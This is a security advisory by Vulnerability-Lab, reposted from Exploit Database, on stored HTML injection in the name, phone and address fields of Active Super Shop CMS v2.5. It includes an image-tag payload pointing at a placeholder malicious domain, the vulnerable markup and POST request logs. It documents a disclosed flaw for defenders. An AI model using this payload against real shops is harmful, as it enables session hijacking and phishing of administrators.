Active Super Shop CMS v2.5 – HTML Injection Vulnerabilities

• Exploit Database
• 41 阅读

• 作者： Vulnerability-Lab
  日期： 2023-07-20
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51613/

• # Exploit Title: Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities
  References (Source): https://www.vulnerability-lab.com/get_content.php?id=2278
  Release Date: 
  2023-07-04
  Vulnerability Laboratory ID (VL-ID): 2278
  
  Common Vulnerability Scoring System: 5.4
  
  Product & Service Introduction:
  ===============================
  https://codecanyon.net/item/active-super-shop-multivendor-cms/12124432
  
  
  Abstract Advisory Information:
  ==============================
  The vulnerability laboratory core research team discovered multiple html injection vulnerabilities in the Active Super Shop Multi-vendor CMS v2.5 web-application.
  
  
  Affected Product(s):
  ====================
  ActiveITzone
  Product: Active Super Shop CMS v2.5 (CMS) (Web-Application)
  
  
  Vulnerability Disclosure Timeline:
  ==================================
  2021-08-20: Researcher Notification & Coordination (Security Researcher)
  2021-08-21: Vendor Notification (Security Department)
  2021-**-**: Vendor Response/Feedback (Security Department)
  2021-**-**: Vendor Fix/Patch (Service Developer Team)
  2021-**-**: Security Acknowledgements (Security Department)
  2023-07-05: Public Disclosure (Vulnerability Laboratory)
  
  
  Discovery Status:
  =================
  Published
  
  
  Exploitation Technique:
  =======================
  Remote
  
  
  Severity Level:
  ===============
  Medium
  
  
  Authentication Type:
  ====================
  Restricted Authentication (User Privileges)
  
  
  User Interaction:
  =================
  Low User Interaction
  
  
  Disclosure Type:
  ================
  Responsible Disclosure
  
  
  Technical Details & Description:
  ================================
  Multiple html injection web vulnerabilities has been discovered in the official Active Super Shop Multi-vendor CMS v2.5 web-application.
  The web vulnerability allows remote attackers to inject own html codes with persistent vector to manipulate application content.
  
  The persistent html injection web vulnerabilities are located in the name, phone and address parameters of the manage profile and products branding module.
  Remote attackers with privileged accountant access are able to inject own malicious script code in the name parameter to provoke a persistent execution on
  profile view or products preview listing. There are 3 different privileges that are allowed to access the backend like the accountant (low privileges), the
  manager (medium privileges) or the admin (high privileges). Accountants are able to attack the higher privileged access roles of admins and manager on preview
  of the elements in the backend to compromise the application. The request method to inject is post and the attack vector is persistent located on the application-side.
  
  Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and
  persistent manipulation of affected application modules.
  
  Request Method(s):
  [+] POST
  
  Vulnerable Module(s):
  [+] Manage Details
  
  Vulnerable Parameter(s):
  [+] name
  [+] phone
  [+] address
  
  Affected Module(s):
  [+] manage profile
  [+] products branding
  
  
  Proof of Concept (PoC):
  =======================
  The html injection web vulnerabilities can be exploited by remote attackers with privileged accountant access and with low user interaction.
  For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.
  
  
  Exploitation: Payload
  <img src="https://[DOMAIN]/[PATH]/[PICTURE].*">
  
  
  Vulnerable Source: manage_admin & branding
  <div class="tab-pane fade active in" id="" style="border:1px solid #ebebeb; border-radius:4px;">
  <div class="panel-heading">
  <h3 class="panel-title">Manage Details</h3>
  </div>
  <form action="https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/" class="form-horizontal" method="post" accept-charset="utf-8">
  <div class="panel-body">
  <div class="form-group">
  <label class="col-sm-3 control-label" for="demo-hor-1">Name</label>
  <div class="col-sm-6">
  <input type="text" name="name" value="Mr. Accountant"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">" id="demo-hor-1" class="form-control required">
  </div></div>
  <div class="form-group">
  <label class="col-sm-3 control-label" for="demo-hor-2">Email</label>
  <div class="col-sm-6">
  <input type="email" name="email" value="accountant@shop.com" id="demo-hor-2" class="form-control required">
  </div></div>
  <div class="form-group">
  <label class="col-sm-3 control-label" for="demo-hor-3">
  Phone</label>
  <div class="col-sm-6">
  <input type="text" name="phone" value="017"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">" id="demo-hor-3" class="form-control">
  </div></div>
  
  
  --- PoC Session Logs (POST) ---
  https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/
  Host: assm_cms.localhost:8080
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
  Accept: text/html, */*; q=0.01
  X-Requested-With: XMLHttpRequest
  Content-Type: multipart/form-data; boundary=---------------------------280242453224137385302547344680
  Content-Length: 902
  Origin:https://assm_cms.localhost:8080
  Connection: keep-alive
  Referer:https://assm_cms.localhost:8080/shop/admin/manage_admin/
  Cookie: ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; curr=1
  -
  POST: HTTP/3.0 200 OK
  content-type: text/html; charset=UTF-8
  ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; path=/; HttpOnly
  https://assm_cms.localhost:8080/shop/admin/manage_admin/
  Host: assm_cms.localhost:8080
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate, br
  Connection: keep-alive
  
  
  Reference(s):
  https://assm_cms.localhost:8080/shop/
  https://assm_cms.localhost:8080/shop/admin/
  https://assm_cms.localhost:8080/shop/admin/manage_admin/
  https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/
  
  
  Solution - Fix & Patch:
  =======================
  Disallow inseration of html code for input fields like name, adress and phone. Sanitize the content to secure deliver.
  
  
  Security Risk:
  ==============
  The security risk of the html injection web vulnerabilities in the shopping web-application are estimated as medium.
  
  
  Credits & Authors:
  ==================
  Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab